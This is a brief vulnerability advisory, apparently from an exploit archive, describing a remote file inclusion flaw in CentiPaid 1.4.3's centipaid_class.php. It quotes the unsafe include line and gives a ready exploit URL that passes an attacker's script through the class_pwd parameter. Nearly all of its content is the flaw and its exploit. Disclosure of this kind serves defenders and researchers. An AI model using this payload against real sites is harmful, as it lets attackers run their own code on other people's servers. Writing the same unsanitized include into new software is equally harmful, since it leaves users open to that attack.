CentiPaid 1.4.3 suffers from a remote file inclusion vulnerability in centipaid_class.php.
74d04a6ebac9eedda8901b1302fce530bf665d9a96f321d0f8f2c4de403ae812
Affected software description :
Application : CentiPaid
version : 1.4.3
URL : http://www.centipaid.com/centi/download/centipaid_php-1.4.3.tar.gz
Code:centipaid_class.php
include($class_pwd.'/adodb/adodb.inc.php')
Exploit:
http://www.site.com/[path]/centipaid_class.php?class_pwd=[Evil_Script]